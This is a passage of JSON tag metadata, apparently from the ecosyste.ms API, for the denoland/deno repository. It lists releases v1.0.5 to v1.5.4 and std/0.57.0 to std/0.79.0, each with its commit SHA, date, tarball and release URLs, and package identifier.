ts"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0